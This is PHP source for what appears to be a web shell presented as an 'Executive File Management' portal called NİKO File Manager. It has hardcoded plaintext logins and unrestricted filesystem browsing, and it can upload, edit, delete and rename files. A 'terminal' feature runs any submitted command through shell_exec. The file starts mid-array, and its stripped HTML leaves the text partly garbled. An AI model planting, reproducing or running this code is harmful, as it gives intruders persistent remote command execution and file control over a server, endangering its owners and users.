VULN_CHECK_0COQYT '4695', 'admin' => '46597', 'executive' => 'admin4695' ]; $current_user = $_SESSION['user'] ?? null; if (!isset($_SESSION['authenticated'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { $username = $_POST['username']; $password = $_POST['password']; if (isset($users[$username]) && $users[$username] === $password) { $_SESSION['authenticated'] = true; $_SESSION['user'] = $username; $_SESSION['login_time'] = time(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $error = 'Access Denied'; } } // NİKO Login Interface echo ' NİKO File Manager
NİKO Avatar
Executive File Management
Where Wealth Meets Technology
▣ Secure Executive Access Portal ▣
🔐 Authorized Personnel Only - Executive Access Required
'; if (isset($error)) { echo '
⚠ ' . htmlspecialchars($error) . ' ⚠
'; } echo '
© 2024 NİKO File Management System - Ultra Premium Edition
'; exit; } // Logout if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } // Helper functions function safe($str) { return htmlspecialchars($str, ENT_QUOTES, 'UTF-8'); } function formatBytes($size) { if ($size <= 0) return '0 B'; $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']; $pow = floor(log($size) / log(1024)); return number_format($size / pow(1024, $pow), 2) . ' ' . $units[$pow]; } function getFileIcon($filename) { $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $icons = [ 'php' => '⚡', 'html' => '🌐', 'css' => '🎨', 'js' => '📜', 'json' => '📋', 'txt' => '📄', 'md' => '📝', 'pdf' => '📕', 'doc' => '📘', 'docx' => '📘', 'jpg' => '🖼️', 'jpeg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'svg' => '🎯', 'mp3' => '🎵', 'wav' => '🎵', 'mp4' => '🎬', 'avi' => '🎬', 'mov' => '🎬', 'zip' => '📦', 'rar' => '📦', '7z' => '📦', 'tar' => '📦', 'gz' => '📦', 'sql' => '🗃️', 'db' => '🗃️', 'sqlite' => '🗃️', 'xml' => '🔖', 'ini' => '⚙️', 'log' => '📊', 'tmp' => '🗂️', 'bak' => '💾', 'conf' => '🔧', 'cfg' => '🔧' ]; return $icons[$ext] ?? '📄'; } // Current directory $current_dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd(); if (!$current_dir || !is_readable($current_dir)) { $current_dir = getcwd(); } // Handle file download if (isset($_GET['download'])) { $file = $current_dir . '/' . basename($_GET['download']); if (file_exists($file) && is_file($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); header('Cache-Control: must-revalidate'); header('Pragma: public'); readfile($file); exit; } } // Handle AJAX requests if (isset($_POST['action'])) { header('Content-Type: application/json'); switch ($_POST['action']) { case 'edit_file': $file = $current_dir . '/' . basename($_POST['file']); if (file_exists($file) && is_readable($file)) { $content = file_get_contents($file); echo json_encode(['success' => true, 'content' => $content]); } else { echo json_encode(['success' => false, 'error' => 'File access denied']); } exit; case 'save_file': $file = $current_dir . '/' . basename($_POST['file']); $content = $_POST['content']; if (file_put_contents($file, $content) !== false) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'error' => 'Save operation failed']); } exit; case 'delete': $target = $current_dir . '/' . basename($_POST['target']); if (is_dir($target)) { $success = @rmdir($target); } else { $success = @unlink($target); } echo json_encode(['success' => $success]); exit; case 'rename': $oldName = $current_dir . '/' . basename($_POST['old_name']); $newName = $current_dir . '/' . basename($_POST['new_name']); $success = @rename($oldName, $newName); echo json_encode(['success' => $success]); exit; case 'create_file': $file = $current_dir . '/' . basename($_POST['filename']); $success = @file_put_contents($file, '') !== false; echo json_encode(['success' => $success]); exit; case 'create_folder': $folder = $current_dir . '/' . basename($_POST['folder_name']); $success = @mkdir($folder, 0755); echo json_encode(['success' => $success]); exit; case 'upload': if (isset($_FILES['files'])) { $files = $_FILES['files']; $uploaded = 0; $total = is_array($files['name']) ? count($files['name']) : 1; if (is_array($files['name'])) { for ($i = 0; $i < $total; $i++) { if ($files['error'][$i] === UPLOAD_ERR_OK) { $target = $current_dir . '/' . basename($files['name'][$i]); if (move_uploaded_file($files['tmp_name'][$i], $target)) { $uploaded++; } } } } else { $target = $current_dir . '/' . basename($files['name']); if (move_uploaded_file($files['tmp_name'], $target)) { $uploaded = 1; } } echo json_encode(['success' => $uploaded > 0, 'uploaded' => $uploaded, 'total' => $total]); } exit; case 'terminal': $command = trim($_POST['command'] ?? ''); if (empty($command)) { echo json_encode(['success' => false, 'error' => 'No command provided']); exit; } $output = ''; try { if (function_exists('shell_exec')) { $full_command = "cd " . escapeshellarg($current_dir) . " && " . $command . " 2>&1"; $output = shell_exec($full_command); } else { $output = 'Shell execution not available on this system'; } } catch (Exception $e) { $output = 'Execution error: ' . $e->getMessage(); } echo json_encode(['success' => true, 'output' => $output ?: 'Command executed with no output']); exit; } } // Get files $files = @scandir($current_dir); if (!$files) $files = []; // Sort files (directories first, then alphabetically) usort($files, function($a, $b) use ($current_dir) { if ($a === '.' || $a === '..' || $b === '.' || $b === '..') return 0; $a_is_dir = is_dir($current_dir . '/' . $a); $b_is_dir = is_dir($current_dir . '/' . $b); if ($a_is_dir && !$b_is_dir) return -1; if (!$a_is_dir && $b_is_dir) return 1; return strcasecmp($a, $b); }); // Get system information $system_info = [ 'php' => PHP_VERSION, 'os' => PHP_OS, 'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', 'memory' => ini_get('memory_limit'), 'user' => get_current_user(), 'disk_free' => formatBytes(disk_free_space($current_dir)), 'disk_total' => formatBytes(disk_total_space($current_dir)), 'current_dir' => $current_dir, 'file_count' => count($files) - 2, // Exclude . and .. 'session_time' => isset($_SESSION['login_time']) ? time() - $_SESSION['login_time'] : 0 ]; $user_titles = [ 'NİKO' => 'Chairman & CEO', 'admin' => 'System Administrator', 'executive' => 'Chief Executive Officer' ]; $user_title = $user_titles[$current_user] ?? 'Executive'; ?> NİKO File Manager - Executive Dashboard
Executive File Management System
Files
Free Space
Session
Logout
Current Location: 🏠 Root'; foreach ($path_parts as $part) { if (empty($part)) continue; $current_path .= '/' . $part; echo ' / ' . safe($part) . ''; } ?>
'; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } // Files and directories foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $filepath = $current_dir . '/' . $file; if (!is_readable($filepath)) continue; $is_dir = is_dir($filepath); $size = $is_dir ? 'DIR' : formatBytes(filesize($filepath)); $modified = date('M d, Y H:i', filemtime($filepath)); $perms = substr(sprintf('%o', fileperms($filepath)), -4); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; } ?>
Name Size Modified Perms Actions
📁 ..----
'; if ($is_dir) { echo ' 📁 ' . safe($file) . ''; } else { $icon = getFileIcon($file); echo ' ' . $icon . ' ' . safe($file) . ''; } echo '' . $size . '' . $modified . '' . $perms . '
'; if (!$is_dir) { echo ' Edit'; echo ' Download'; } echo ' Rename'; echo ' Delete'; echo '

Edit File

NİKO Terminal

╔══════════════════════════════════════════════════════════════╗ ║ 💰 NİKO TERMINAL 💰 ║ ║ Executive Command Center ║ ╚══════════════════════════════════════════════════════════════╝
🌐 System:
🔧 PHP:
👤 User:
📁 Location:
══════════════════════════════════════════════════════════════
NİKO terminal ready. Type 'help' for available commands.

NİKO@:~$

Create New Item